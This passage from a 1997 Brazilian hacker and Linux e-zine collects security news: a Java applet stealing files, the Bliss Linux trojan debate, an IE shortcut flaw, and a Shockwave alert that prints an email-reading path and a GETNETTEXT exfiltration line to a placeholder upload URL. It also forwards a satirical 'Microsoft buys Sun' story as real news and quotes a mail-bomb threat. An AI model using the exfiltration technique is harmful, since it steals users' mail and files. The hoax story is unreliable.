inclusive explicando como e' feito a infeccao e a sua
propagacao.
Maiores detalhes podem ser obtidos em:
http://www.mcafee.com/support/techdocs/vinfo/v3333.
html
Uma analise bem interessante de como as mensagens
que foram repassadas
pela imprensa sobre o virus pode ser vista no seguinte
site:
http://www.kumite.com/myths/myths/myth029.htm
Maiores informacoes sobre virus de macro e como se
previnir dele podem
ser obtidas em:
http://www.microsoft.com/kb/articles/q138/8/68.htm
Cabe ressaltar que este virus nao vai infectar o
computador pelo simples
fato de ser recebido pelo email, mas sim se rodado, como
pode acontecer
com qualquer executavel anexado a um email... Cabe ai' a
quem receber o
email ser cuidadoso, fazendo com que o arquivo
recebido seja "passado"
por um anti-virus. Outra recomenda|{o e' designar que
arquivos .DOC nao
sejam abertos automaticamente pelo MS-Word, mas sim
pelo WordView, que
pode ser conseguido no site da Microsoft:
http://www.microsoft.com/word/internet/viewer/viewer9
5/default.htm
Como no WordView nao sao executados macros, alem
de que nao ha' como
salvar arquivos, ele se torna uma ferramenta bastante
util para visualizar
arquivos sem correr o risco de ver o seu Word ser
infectado por um virus de
macro.
[]'s
http://www.tca.com.br/usrf/charles/
-------------------------------------------------------
APPLETS JAVA PODEM ATACAR SUA REDE
Paul Merenbloom, para o InfoWorld
De vez em quando, os privilegios de ser colunista do InfoWorld sao um
tiro pela culatra. Alguem leu minha coluna e me enviou alguns
aplicativos Java muito interessantes projetados para gerenciar e
controlar roteadores de maneira segura. Baixei-os recentemente e logo
reparei que meu disco rigido comecou a fazer extravagancias. De
repente, passou a funcionar como se estivesse sem espaco.
Pensei que talvez fosse um problema de caching do Windows 95, por
isso desliguei a maquina, dei novo boot no modo MS-DOS e fui direto
para o diretorio WINDOWS\TEMP. Havia muitos arquivos TMP esquecidos
la. Com um simples DEL *.* resolvi o problema e retornei ao trabalho.
Mas meus problemas nao pararam ai. Meu browser estava rodando o
codigo Java de novo - desta vez, sem qualquer outro aplicativo na
memoria - quando o disco rigido ficou enlouquecido. Droga! Eu tinha
uma conexao dial-up aberta porque o codigo que estava executando veio
de uma fonte baseada na Web. Bingo! Uma olhada rapida nas luzes do
modem mostrou a luz de dados enviados brilhando intensamente!
A luz apagou e um e o computador iniciou uma rotina de captura.
Parece que alguem estava usando o codigo Java para descarregar meu
registro e selecionar arquivos, sobretudo os terminados em .XLS -
dados de planilha.
Isto explicou o funcionamento constante do disco rigido. O codigo
estava buscando meus arquivos! Felizmente, os unicos arquivos .XLS
neste PC sao os demos que vem com o CD Office Professional da
Microsoft. Mas se houvesse dados importantes eu estaria em apuros.
Evidentemente, a pessoa que estava me mostrando o novo software de
gerenciamento nao tinha a menor ideia de que alguem havia inserido
codigo trapaceiro no aplicativo Java.
O interessante e que o applet usou meu codigo de e-mail para
redirecionar os arquivos secretamente - sem duvida, um bom exemplo de
crianca travessa brincando fora do quadrado de areia Java.
Minha experiencia ilustra um aspecto importante em termos de browsers
e Java. Primeiro, as variedades espantosas de codigo Java existentes,
cada um com um "sabor" diferente de implementacao Java, vao dificultar
muito a integracao com sistemas de seguranca padroes. Segundo, a Java
e muito interessante e oferece grande potencial, mas um applet tambem
pode estar ocultando o proximo cavalo de Troia a entrar em sua rede.
Contei esta historia a um amigo e ele sugeriu que eu desse uma olhada
em um site chamado Finjan (http://www.finjan.com).
O site Web Finjan tem um sistema de verificacao de seguranca Java que
parece muito solido. Se voce apontar seu browser Web para la,
descobrira quanta informacao um invasor pode obter empregando uma
simples query.
Mais importante, o Finjan oferece um diagnostico de seguranca que
examina seu browser e alerta-o sobre do status da implementacao de
seguranca. Tambem faz recomendacoes sobre o que esta em risco e como
voce pode fechar qualquer gap. O codigo custa US$ 49 por copia e pode
ser baixado do site.
Voce tambem pode enviar o numero do seu cartao de credito ao Finjan.
Isso e ironia demais para mim.
Este incidente prova que existem muitas maneiras de alguem extrair
dados de seu PC ou sua LAN sem seu conhecimento ou sua permissao.
Ainda sou um grande fa da Java, mas agora estou mais prudente. E
provavel que algum dia alguem desafie sua rede com estes tipos de
ferramentas Java. Quanto a mim, estou enviando ao Finjan meus US$ 49
pelo correio e pode ter certeza de que estarei checando seus
browsers.
Paul Merenbloom e vice-presidente de pesquisa de tecnologia na Piper
Jaffray, em Minneapolis.
*******************************************************************
Lista Informativa MeuPovo.
--------------------------------------------------------
Subject: Shockwave security alert !
As informacoes abaixo podem ser achadas em :
http://www.webcomics.com/shockwave/mail.html
--------------------------------------------------------------------------
Shockwave Security Alert
10-Mar-97 --- reported by: David de Vitry -- updated
20-Mar-97
What is this about?
There are three potential security holes through Shockwave. All three
require Shockwave, and all three are fixed with a
Security Fix from Macromedia, issued 3/19/97. Information in your
email, on your hard drive or on your corporate
intranet could all be copied to a distant server. All three have been
verified by Macromedia. This chart details each:
Security Hole
Affects
Description
Reading email
Netscape 2-3, on Win
95 / NT or Mac
Shockwave can read mail folders from
Netscape, Eudora, and others
that use a similar mail file format.
Internal
Websites
Netscape, IE, others?
on Win 95/ NT or Mac
Shockwave has access to any website
the you have access to. This
include corporate intranets and
personal webservers.
Any local file
Netscape 2.02, 3.0 on
Win 95 / NT or Mac
Shockwave also has access to any local
file on the users hard drive.
The filename must be guessed by the
attacker, pulling a directory tree is
not possible. This problem was
discovered by Dave Yang.
also: How information is copied to a website | What you can do | What
are they saying
Internal Websites.
Users of Corporate intranets who have shockwave installed are
potentially vunerable. A malicious shockwave movie
could have access to your internal website, and potentially internal
websites or personal sites. Once the program
accesses potentially confidential information, information can be
copied to a website on the internet.
Users of Microsoft IE should be aware that Shockwave will
automatically install when entering a page with a
Shockwave movie on it. Users are presented with an authenticode
digital certificate. However, the signature on it is from
Macromedia, and not the author of the potentially malicious shockwave
movie.
Reading Email
A developer can use Shockwave to access the user's Netscape email
folders. This is done assuming the name and path
to the mailbox on the users hard drive. For example names such as:
Inbox, Outbox, Sent and Trash are all default names
for mail folders. The default path to the "Inbox" on Win 95/NT would
be: "C:/Program
Files/Netscape/Navigator/Mail/Inbox". Then the developer can use the
Shockwave command "GETNETTEXT"
to call Navigator to query the email folder for an email message. The
results of this call can then be feed into a variable,
and later processed and sent to a server. To access a message, for
example, the first message in a users Inbox for
Netscape mail users, would be called using the following location:
For Windows: mailbox:C:/Program
Files/Netscape/Navigator/Mail/Inbox?number=0
For MacOS (thanks Jeremy Traub)
mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbo
x?number=0
Note: I have not yet added links for Eudora or similar email readers,
but these are also vunerable to this
problem. if these links all give you an error (such as folder no
longer exists), then you might not have anything
to worry about. However, if you see an email message in a pop up
window, and you have Shockwave
installed, then you are vulnerable to this security hole.
Show Me an example! Here it is, a Shockwave movie that will read your
email. This will not work for everyone, it is
currently only setup to work with Win95 / NT, but it could be extended
to identify the browser (Jeremy Traub).
Reading Local Files
Shockwave also has access to any local file on the users hard drive.
This problem was discovered by Dave Yang.
Details of how this is accomplished will not be released due to the
serious nature of this problem. An demo of this
problem is available. Again this information accessed then copied to a
website.
Interesting, but how can information be copied to a website?
This is a well known operation. See the Full Details
Any information that a shockwave movie has access to can potentially
be copied to a website on the internet. This
information could then be sent back to a server cgi program that
accepts this type of information. This is done using long
urls, where the information is passed as a query within the location
through the getnettext command. i.e.
GETNETTEXT
"http://www...com/upload.cgi?data=This_could_be_your_content_here". This
can all happen with out
the user ever noticing. Here are just a few types of information that
a malicious developer could obtain using this hole:
Your email
Any file on your local hard drive
Any file on any website you have access to
Help: What can I do to protect myself?
The only recommendation I have at this point is to Install the newest
version of Shockwave. Mac users just need to
change the name of their hard drive to protect their local files,
however, shockwave still has access to webservers.
VIRUS DE LINUX(?) ----------------------------
Subject: [LINUX-BR] bliss
http://www.math.ucsb.edu/%7Eboldt/bliss/
Fernando M.R.M.
---------------NOTA DO EDITOR----------------
O URL acima contem uma serie de links para textos interessantes,
desmistificando o assunto. Talvez os textos mais importantes relativos ao
fato sejam os que coloquei abaixo:
* PRESS RELEASE DA MCAFEE SOBRE O VIRUS BLISS *
MCAFEE DISCOVERS FIRST LINUX VIRUS; SHIPS NEW VERSION OF VIRUSSCAN TO DETECT
AND REMOVE BLISS VIRUS
SANTA CLARA, CALIF. (February 5, 1997) -- McAfee (Nasdaq: MCAF), the
world's leading vendor of anti-virus software, today announced that
its virus researchers have discovered the first computer virus capable
of infecting the Linux operating system. The Linux operating system is
a publicly supported freeware variant of the Unix operating system
that runs on Intel-based personal computers.
The virus, which is called Bliss, is significant because many in the
Unix industry have previously believed that viruses were not a concern
to Unix operating system users. Unix operating systems are typically
difficult to infect with viruses since a virus writer must have
administrative privileges to infect a given Unix system. McAfee
researchers believe that one reason this virus has begun to spread is
because Linux users who are playing computer games over the Internet,
such as DOOM, must play the game in the Linux's administrator mode,
which is called "root."
"Bliss is a destructive virus which overwrites Linux executables with
its own code," said Jimmy Kuo, McAfee's director of anti-virus
research. "Although several incidents of Bliss infection have already
been reported, the virus is not currently widespread. We encourage
concerned Linux users to download a free working evaluation copy of
our VirusScan for LINUX, which can be used to detect the virus."
The History of Bliss
Very little is known about the history of the Bliss virus. McAfee
discovered the Bliss virus two days ago, and posted a solution
Wednesday evening on its web site. The virus is believed to have been
created as a research project several months ago by an anonymous
programmer, and until recently was not an "in-the-wild" threat.
Recently, reports of the virus have begun to surface within Linux
Internet news groups.
How Bliss Works
Bliss infects Linux executable files. Each time Bliss is executed, it
overwrites two or more additional files. Because the virus makes its
presence known by overwriting and destroying files each time it
executes, users are immediately alerted to its presence. Bliss
overwrites the first 17,892 bytes of each affected file with its own
code. According to McAfee anti-virus researchers, all files infected
by Bliss are irrecoverable. Although the virus does not operate under
traditional operating systems such as DOS, Windows, Windows 95,
Windows NT, NetWare and the Macintosh, files created in these
aforementioned operating system formats and stored on Linux file
servers are vulnerable to corruption by Bliss.
McAfee Ships World's First Bliss Virus Scanner
As a public service, McAfee has developed a special update of its
VirusScan for LINUX software which provides an antidote for the virus.
The free working evaluation version of the product can be downloaded
from McAfee's web site at www.mcafee.com.. McAfee has also provided
the virus sample to other anti-virus vendors, so that they too can
develop solutions to protect their customers.
[Parte editada - A McAfee e' popular demais pra precisar de publicidade
deste Fanzine]
McAfee's Web address is http://www.mcafee.com.
###
ESTA E' A RESPOSTA SOBRE A "DESCOBERTA" DO VIRUS FEITA MCAFEE
Subject: Re: [masq] 1st virus in Linux :( (fwd)
From: Russ Allbery
Date: 1997/02/08
Newsgroups: linux.dev.kernel
Ambrose Au writes:
> In case you do not notice, there is a new destructive virus called Bliss
> which infects Linux executables.
> Its target is users who play games such as doom over the Internet with
> root access.
> Details at Mcafee's website: http://www.mcafee.com/corp/press/020597.html
This is not a virus in the way the term is used for operating systems
without memory protection.
Any program being run as root has priviledges to modify the file system
and do damage to your system; this is why you do not run general binaries
as root. All this is is a simple Trojan Horse, based on the idea of
getting stupid people to run unknown binaries as root, with an interesting
side twist of modifying other system binaries when it runs. McAfee's
statements about this are, at best, misleading. To quote from their web
site:
McAfee (Nasdaq: MCAF), the world's leading vendor of anti-virus
software, today announced that its virus researchers have discovered
the first computer virus capable of infecting the Linux operating
system.
Whatever you would like to call this, it quite definitely isn't anything
new. Trojan Horse binaries for Unix systems have been around for years,
as have Trojan Horse modified source distributions; there was a CERT
several years ago about IRC, for example.
The virus, which is called Bliss, is significant because many in the
Unix industry have previously believed that viruses were not a concern
to Unix operating system users.
The implication behind this statement is patently absurd. Obviously, as
anyone who knows anything about Unix is aware, if you run a hostile
program as root it can do all sorts of nasty things to your system. Duh.
Again, McAfee is attempting to portray this as some major new problem when
it's nothing of the sort.
We encourage concerned Linux users to download a free working
evaluation copy of our VirusScan for LINUX, which can be used to
detect the virus.
No thank you. Linux doesn't need a virus checker; Linux administrators
need to use some basic intelligence about what they run as root. People
who run binary-only packages obtained from untrusted sources as root on
their system get exactly what they deserve.
It looks to me like McAfee is attempting to use this as a publicity stunt
to promote their software business and to attempt to scare Linux users
into paying them money. I'll refrain from speculating about how much of a
threat a real operating system is to a company who makes its living on
protecting users of less sophisticated operating systems from their
inherent limitations.
McAfee just flushed all respect I had for them down the toilet.
--
Russ Allbery (rra@cs.stanford.edu)
--------------------------------------------
Subject: Re: [masq] 1st virus in Linux :( (fwd)
From: alan@lxorguk.ukuu.org.uk (Alan Cox)
Newsgroups: linux.dev.kernel
> It's a virus in the old sense all right.
No. Its a trojan. If the superuser doesn't run a binary containing it then
it cannot affect more than the binaries a user has created of their own.
Having the superuser run random user installed binaries could do far
worse.
> its own remover, if you execute a binary with some weird option in the GNU
> long option style, and in that if creates a log of its activities.
Thats actually a bug - its meant to exec the 'log' copy.
> Actually, I fail to understand the need of people to relabel a virus as a
> trojan.
Because there are specific distinctions in security between a program
which actively operates and seeks to attack system resources or applications
to infect things and a trap that sits waiting for someone dumb enough to
run it.
McAffee are also wrong in that its the first unix virus for other reasons,
such as the fact if you class it as a virus then people have demoed other
similar tools. Those kind of latent trojans are big business in the
military security/information warfare world, and thus I'd also suspect soon
in the realms of sabotage and the less legal side of things.
Once you've got the BLISS source reversed BTW you can port it to just
about any OS I can think of including stuff like NT and VMS in a matter of
of minutes
Followups to linux-security and or bugtraq
-----------------------------------
BUG NO INTERNET EXPLORER
Subject: displayStory.pl?97033.wbug.htm
By Bob Trott
InfoWorld Electric
Posted at 3:04 PM PT, Mar 3, 1997
A security flaw has been revealed in Microsoft's Internet Explorer
(IE) browser that allows devious Web page writers to use .LNK and .URL
files to surreptitiously run programs on a remote computer, even when
the browser is set to its highest security level.
The security lapse was discovered by a Worcester Polytechnic Institute
student in Massachusetts who was posting documents on a Web page and
created a shortcut to the folder rather than copying it. The student,
Paul Greene, accessed the shortcut, and File Explorer popped up into
the folder.
Greene then used Internet Explorer's version of the shortcut, .URL
files, by changing the setting to file://filename. Although .LNK files
only work in Windows 95, .URL files are compatible with both Windows
95 and Windows NT 4.0.
When run through Navigator or other non-Microsoft browser, the files
merely display the written command.
The shortcuts can be set to be minimized during execution, meaning
users may not know that a program has been started, Greene said.
"The ramification for IE is that any anti-Microsoft jerk can set up
their Web site to be destructive to anyone using Internet Explorer and
safe for all others browsers," Greene said.
Microsoft planned to have information about the security flaw posted
Monday afternoon, with a fix to follow soon thereafter, said Dave
Fester, lead product manager for Explorer.
Fester was quick to point out that the security breach could be
triggered only by someone who intentionally sought to do so. And the
malicious Web author must know what programs are on the remote
computer in order to target them, he said.
"A Webmaster has to know what specific programs are on (the target's)
hard drive, as well as the path to use to activate through a link,"
said Fester.
However, hackers with any knowledge of DOS and Windows 95 know what
programs are on a given PC. Also, Greene and two other students who
built several bug demos, Geoffrey Elliott and Brian Morin, said a .BAT
file can be copied to the Internet Explorer cache and executed from
there, where the standard path points to all programs.
The Explorer bug can be tested at http://www.cybersnot.com/iebug.html.
Microsoft Corp., in Redmond, Wash., is at http://www.microsoft.com/.
Please direct your comments to InfoWorld Electric News Editor Dana
Gardner.
Copyright ) 1997 InfoWorld Publishing Company
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
LINUX DICAS, ENDERECOS, ETC..
> > perdido. O meu maior problema e que eu nao sei quais arquivos devo pegar para formar o Linux
!!
> > Alguem poderia me ajudar !!
>
> Vamos l'a... deixa eu fazer minha boa acao do dia :)
Acho que serao varios e longos dias :-D !!
> Para instalar o Linux voce deve recorrer a uma distribuicao. Isto e'
> a um conjunto de pacotes que alguem ja se dignou a selecionar e distribuir
> com um sisteminha de instalacao simpatico. Ou seja ja fez o trabalho duro.
> Daria para fazer na mao tambem, mas eu duvido que voce preferira e para falar
> a verdade nao conheco ninguem que tenha tido paciencia de faze-lo.
> Que distribuicao utilizar ? Bom... eh uma questao em aberto e se voce
> fizer a pergunta na lista recebera quilos de respostas que nao levarao a lugar
> nenhum. Vai muito dos gostos e necessidades pessoais. Entao o melhor a fazer
> e conhecer as caracteristicas das principais e ver qual se adapta mais ao seu
> gosto e necessidade. Outra opcao eh utilizar a distribuicao do seu guru parti
> cular de forma a facilitar o trabalho dele, isto e' e voce tiver algum.
> Aqui vai uma rapida descricao:
>
> slackware: tem a vantagem de ser possivel instalar facilmente de
> diquetes. Eh o sistema mais cru e com menos aplicativos, mas nada impede que
> voce posteriormente instale-os separadamente. Nao possue um sistema de controle
> dependencias.
>
> RedHat: eh o que possui o sistema de instalacao mais simpatico e com
> controle de dependencias razoavel. Possui o maior numero de aplicativos inclu
> ive alguns nao free-software. Ganhou o premio de melhor distribuicao de sistema
> operacional para PC ano pasado.
A meu ver esse me parece ser a melhor opcao !!
> debian:antiga distribuicao da free software foundation. Possui um siste
> ma de instalacao muito decente e com um controle de dependencias bem rigido,
> porem e' em modo texto, o que nao chega a ser um problema. Possui tambem uma
> boa selecao de aplicativos. A principal vantagem e a estrutura do filesystem
> compativel com a do SVR4( ou seja solaris e cia). Eh a que eu utilizo.
> Para comprar o bizu e' a cheapbytes: http://www.cheapbytes.com.
> Para fazer ftp ftp.sunsite.dcc.unicamp.br
> Voce pode ler uma comparacao entre as distros na pagina do Linux Journal
>
>
Subject: [LINUX-BR] Queres um Linux "pequeno" para baixar...? (fwd)
Vai na ftp.sunsite.unc.edu/pub/Linux/Incoming e pega
o Dilinux ou DOSLinux...
Sao uns 7 arquivos de 1.4Mb e mais um executavel.
Depois de descompactar e instalat teras um Linux
que boota via DOS e roda em ambiente texto...
Se quiseres o ambiente grafico vais ter que pegar mais
umas "coisinhas" ;)
Mas com isto ja da para le ligar ao provedor de
acesso e navegar na rede.
TTS T+
SUPER PAGINA DO LINUX
Gostei tanto que coloquei aqui o conteudo do URL abaixo. O autor, Marcelo,
ta' fazendo um trabalho legal e a URL dele
(http://www.dca.fee.unicamp.br/~malheiro/linux/index.html)
Os links abaixo foram tirados da pagina dele e o cara aceita inclusoes.
http://www.dca.fee.unicamp.br/~malheiro/linux/serv.html
Servicos, Paginas e Documentacao sobre Linux no Brasil
Documentacao
Linux FAQ em Portugues
http://www.inf.ufrgs.br/~kojima/linux/faq-linux.html
Linux Documentation Project - mirror 1
http://www.conectiva.com.br/LDP/linux.html
Linux Documentation Project - mirror 2
http://www.opensite.com.br/linux/linux.html
LDP-br Home Page
http://www.dca.fee.unicamp.br/~malheiro/linux/LDP-br.html
Portuguese HOWTO - mirror
http://www.conectiva.com.br/LDP/HOWTO/Portuguese-HOWTO.html
Dicas
Imprimindo do Linux em uma rede Windows
http://www.pop-ms.rnp.br/~pbastos/samba.html
Sobre Virtual Hosts
http://www.dowell.com.br/virtual.html
Paginas diversas
Grupo de Usuarios Linux do IME/USP
http://www.ime.usp.br:80/gu-linux/
Pagina do Rxo
http://www.geocities.com/SiliconValley/Park/6151/linux.html
Mecanismos de Busca
Pesquisa no histrico da lista Linux-br
http://www.openline.com.br/linux-br/swish.html - via Swish
http://www.openline.com.br/linux-br/ghindex.html - via Glimpse
Canais de IRC
#Linux na BrasNet - assuntos diversos
http://www.sjinfo.com.br/~madmax/linux/
Listas de Discussao
Linux-br - assuntos diversos
http://www.openline.com.br/linux-br/
Para se inscrever mande um mail para listproc@listas.ansp.br
com subscribe linux-br [seu nome] no corpo da mensagem.
LinuxISP-BR - Linux em provedores de acesso
http://www.conectiva.com.br/listas/LinuxISP-BR/
Para se inscrever mande um mail para
LinuxISP-BR-request@listas.conectiva.com.br com apenas
subscribe no campo de subject/assunto.
LDP-br - Lista da iniciativa LDP-br
Para se inscrever mande um mail para
ldp-br-request@listas.sonet.com.br com subscribe no campo de
subject/assunto.
Linux - assuntos diversos
Para se inscrever mande um mail para majordomo@opensite.com.br
com subscribe linux no corpo da mensagem.
Sites de FTP
CCE/UFPR - Slackware 3.2, StarOffice 3.1, Kernels e XFree 3.2 *new*
ftp://cce.ufpr.br/pub/linux/
CCE/UFPR - Arquivo da lista Linux-br
ftp://cce.ufpr.br/pub/linux-br/
FEE/UNICAMP - RedHat, Slackware, Sunsite
ftp://ftp.fee.unicamp.br/pub/Linux/
IC/UNICAMP - Sunsite
http://sunsite.unicamp.br/pub/operating_systems/Linux/
ftp://sunsite.unicamp.br/pub/operating_systems/Linux/
IC/UNICAMP - GNU Software
http://sunsite.unicamp.br/pub/packages/gnu/
ftp://sunsite.unicamp.br/pub/packages/gnu/
IF/USP - Sunsite, TSX-11, Debian, RedHat, Kernels, Java, Perl, Tcl/Tk,
X11R6, e mais...
ftp://linux.if.usp.br/pub/mirror/
IME/USP - Debian
ftp://paprika.ime.usp.br/pub/linux/
Inside - Sunsite (quase completo) *new*
ftp://ftp.iis.com.br/pub/Linux/
Openline - RedHat
ftp://ftp.openline.com.br/mirror/
SJ Internet - Slackware, Kernels, HOWTOs
ftp://ftp.sjinfo.com.br/pub/linux/
UNICAMP - GNU Software
ftp://ftp.unicamp.br/pub/gnu/
UNICAMP - Java para Linux
ftp://ftp.unicamp.br/pub/languages/java/linux/
_________________________________________________________________
###################################
NOTICIAS
Subject: [LINUX-BR] Linux no Espaco
Texto extraido da coluna vitrine da revista Exame, de 26/03/97
"Qual sistema operacional vai controlar os experimentos de gravidade a
bordo da proxima missao espacial do onibus espacial da Nasa ? Errou quem
pensou no Windows de Bill Gates ou em alguma criacao do Steve Jobs. O
sistema escolhido e um Linux, distribuido de graca na Internet, que esta em
5 milhoes de computadores no mundo todo. Esse sistema alternativo surgiu a
partir de uma ideia do finlandes Linus Thorvald em 1990 e se desenvolveu
com a colaboracao de mais de 200 especialistas no mundo virtual. 'O Linux e
o sucessor moderno do sistema UNIX, desenvolvido nos anos 60 e 70 nos
laboratorios Bell, da AT&T', afirma Bruce Perens, colaborador no projeto do
Linux, que tambem trabalhou na animacao do filme Toy Story. Para os
cientistas da Nasa, o Linux e mais confiavel do que todos os sistemas
operacionais disponiveis comercialmente."
Tai pessoal uma prova in contest de que o Linux esta quente nas paradas.
Saudacoes.
Subject: [LINUX-BR] Micro$oft vai comprar a Sun Microsystems
Pasmem com as afirmacoes do Bill. . .
Noticia fresquinha. . .
[]'s, G.
>Date: Mon, 31 Mar 1997 17:04:01 -0800
>From: mas@acm.org (Mark Stalzer)
>Subject: Microsoft buys Sun
>
>This item may be of some interest to RISKS readers, given all of the
>discussions about ActiveX and Java. -- Mark
>
> - - - - - - - - - - - - - - -
>
>Redmond WA, March 31 (Routers) - Microsoft Corporation announced after the
>close today that it will buy Sun Microsystems in a deal valued at $11.7
>billion. The price works out to $50 a share, which is a premium over Sun's
>close at $34. Microsoft will finance the deal by issuing 50 million shares
>of common stock, using some of its cash reserves, and borrowing $5 billion
>at "very low rates" from a "long time strategic partner" rumored to be Intel
>Corporation. Every 4 shares of Sun stock will be exchanged for 1 share of
>newly issued Microsoft stock plus approximately $100 in cash.
>
>Bill Gates, Microsoft's Chairman said "It's time to kill Unix. Unix is
>providing stiff competition to Windows NT in the server arena. We have
>already placed NT on Digital and HP servers, and Sun was the only
>substantial holdout. So we decided just to purchase Sun to assure that
>their servers ship with NT." He continued, "We also wanted control over
>Java to better position ourselves to, uh, compete with Netscape."
>
>The deal was approved earlier today by the boards of both companies. Large
>institutional holders of Sun are known to favor the deal so it should get
>shareholder approval in the coming weeks. Privately, a Sun board member
>said "the price was so sweet, we would be violating our responsibility to
>the shareholders if we didn't accept the offer." Scott McNealy, Chief
>Executive Officer of Sun, was unavailable for comment. Several Sun
>employees expressed dismay, one adding simply that "this sucks."
>
>When asked about transition plans for Solaris, Sun's version of Unix, Taj
>Raji, Sun's Vice President of Systems Software, said that the "Solaris APIs
>will be wrapped around the NT megakernel in a seamless fashion to produce a
>robust feature-rich operating environment." A Microsoft spokesperson
>quickly added that "only native NT applications certified by Microsoft get
>to use the flying windows logo."
>
>Speculation about Intel's possible involvement centered on the SPARC chips
>that power Sun's servers. Intel might incorporate the SPARC architecture
>into their planned Hexium "You're Inside" family of processors. If these
>chips were used in Sun servers, analysts say that Intel would lock up the
>worldwide processor market.
>
>As for Sun's Java technology, if Microsoft follows their standard practice,
>they will make proprietary enhancements to assure market share. One insider
>suggested that they might make "Java more like C++", but others said that
>would be foolish. April Austin, a technology analyst with Hambust-Quick in
>Oakland CA, commented that "the buyout could really put a crimp on Netscape
>since Microsoft will control the two major means of placing active content
>on the web, ActiveX and Java. Microsoft will set the standards and Netscape
>will always be six months behind the feature curve."
>
>A spokesperson for the Department of Justice said there was no official
>comment on the proposed transaction. Although, a highly placed Justice
>source felt that there shouldn't be any problems because "Microsoft is a
>software company and Sun is a hardware company."
>
>The combined company's yearly sales will be approximately $16 billion based
>on end-of-year figures. For the day, Microsoft (MSFT.O) was up 1 5/8 at 97
>7/8 and Sun (SUNW.O) was up 3 3/4 at 34. Officials at the Pacific Stock
>Exchange reported that the volume on Sun April 30 calls was 15 times
>normal. The SEC is investigating possible insider trading.
>
>------------------------------
Sobre o artigo "Curriculo Vitae e o Fussador de Micro" me
enviaram isto p. complementar.
Jovens na faixa dos 20 anos nao tem lealdade a empresa, mas
querem subir rapidamente na profissao
(Tirado do Estado de Sao Paulo - 29/set/96)
JOANN MULLER
The Boston Glose
Os jovens na faixa dos 20 anos estao ingressando nos locais de
trabalho dos Estados Unidos e se afirmando de uma maneira jamais
imaginada pelas geracoes anteriores.
E quem podem censura-los por isso? Convencidos de que nada se
ganha escalando pacientemente os degraus do poder nas empresas, os
trabalhadores da chamada "Geracao X" -nascidos entre 1964 e 1975
- estao exigindo poder e status irnediatamente. Se percebem que
nao estao entrando no circos dos poderosos e influentes nem estao
conseguindo as qualificacoes de que precisam para melhorar sua
carteira, esses jovens nao se importam absolutamente em mudar de
emprego.
Isso criou um novo hiato entre as geracoes nos locais de
trabalho dos Estados Unidos. Os chefes da geracao anterior-
nascidos entre 1946 e 1964-se queixam de que os "pirralhos" tem
pouca capacidade de concentracao e carecem de uma forte etica do
trabalho. Ou, entao, sao rudes, ambiciosos e impacientes.
Os trabalhadores mais jovens afirmam que tais atitudes sao
.simples mente uma tatica de sobrevivencia para uma geracao que
foi testemunha de macicas demissoes na decada de 90 e concluiu que
a lealdade a uma empresa e perda de tempo.
"Nos Ihes ensinamos que ser leal nao e mais uma coisa segura",
disse Clama Pmines, de 49 anos, consultora de empresas de DemTer e
autora do livro Twentysomething: Managing and Motivating Today's
New Work Force (Vinte e Poucos: Administrando e Motivando a Nova
Forca de Trabalho) "Nao e sinal de inteligencia comprometer-se com
a companhia."
Mudancas-Desse conflito de gerenciamento empresarial, que poderao
trazer mudancas aos locais de trabalho. Na realidade, a znica
lealdade que esses novos trabalhadores demonstram e a si proprios.
Isso comeca quando eles entram na faculdade, onde sao forcados a
assumir a responsabilidade pela propria realizacao profisisional.
"Estamos incentivando as pessoas a tracar seu proprio roteiro
na vida, sem esperar que as companhias o facam, disse Wendy Baker,
que dirige o centro profissional do Babson College. E, para dar
mais destaque a esse ponto, Babson acabou com o "centro de
colocacao", uma especie de bolsa de empregos, que rotineiramente
arranjava trabalho para os estudantes mais velhos.
Contudo, para administrar suas proprias carreiras, a atual
geracao de jovens tem um enorme desejo de informacao. Esses jovens
exigem que seus chefes os mantenham informados a respeito das
decisoes importantes e frequentemente querem dados atualizados
sobre o andamento e os planos futuros da companhia
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
CARTAS
--------------------------------------
danielbss@pobox.com se apresentou como o responsavel pela carta
anti-spam ("como ficar preso" parodia da carta "como ficar rico
pela internet"). Veja bem. Ele assumiu a autoria da parodia, nao
da original, que apareceu em tudo quanto e' lista de discussao..
--------------------------------------
Ola Amigos,
O TechnOraculo e'um zine sobre Internet e Informatica , depois da
versao texto numero 01 lancada recentemente agora quero apresentar a versa=
o
HTML da mesma edicao 01 com todos os recursos que esse formato proporciona=
http://www.geocities.com/SouthBeach/5970/
-------------------------------------
Derneval:
Solicito informacoes sobre alguns termos usados no mundo hacker. Estou
desenvolvendo um material e nao gostaria que a minha interpretacao destes
termos dertupasse o mesmo, por isto, ca estou.
Os termos sao os seguintes;
wannabe
looser
lammer
cyberpunk
RESPOSTA:
wannabe : O inicial seria hacker wannabe. E' o cara que so' ouviu falar
de hacking, talvez leu algum livro como o do Shimamura ou do Littman
e quer aprender mais sobre o assunto. O problema e' que a grande maioria
acha que o melhor caminho e' o mais "mastigadinho". Ele quer ser chamado
de "hacker", mas nao quer suar sozinho p. aprender. As vezes algum deles
encontra o caminho.
looser : O cara que so' quer usar o computador como se fosse uma caneta.
Em outras palavras, nao quer aprender nada alem do necessario para digitar
e imprimir um texto. Nao importa de comprar um Pentium com win95 e CDROM
so' pra digitar cartinhas e odeia quando precisa aprender a mexer com
algum programa novo.
lammer : Varias definicoes. A mais comum e' um cara que finge ser algo
que nao e' (ex. um hacker). Tambem usada contra caras que assumem autoria
de trabalhos que nao sao seus. Um cara que nao merece nenhum respeito pelo
que faz, por ir contra qualquer etica.
cyberpunk : Isso e' invencao da midia. Seria o hacker +++ do futuro. Na
verdade, o termo costuma ser usado por pessoas que querem se referir ao
ambiente meio "blade-runner" do atual estagio das telecomunicacoes. O
pessoal do computer underground americano nao adotou a terminologia, por
lembrar que o termo "punk" nos EUA e' homossexual passivo. Ha' um certo
preconceito contra a palavra cyber, mas esta ja' alcancou uso no CUD.
Uma definicao melhor voce consegue seguindo a carta abaixo, tirada do
linux-br
Subject: [LINUX-BR] Hackers
Para quem ainda tinha alguma duvida sobre a diferenca entre hackers e
crackers, estou deixando uma versao HTMLizada do New Hacker's Dictionary
em http://www.brasil.enemy.org/~claudio/jargon.
--------------------------------------------
USO DE MAIL-BOMBER
>
> Atencao Bando de Lamahs:
>
> A partir de hoje todas as listas acima submetidas estao EXPULSAS da esquina. Os
> imbecis que continuarem
> assinados as listas, receberao diariamente uma chuva de mail flood. 500 por dia
> ta bom?
>
>
> Saudacoes!!
> CyberHack
>
COMENTARIO DO EDITOR:
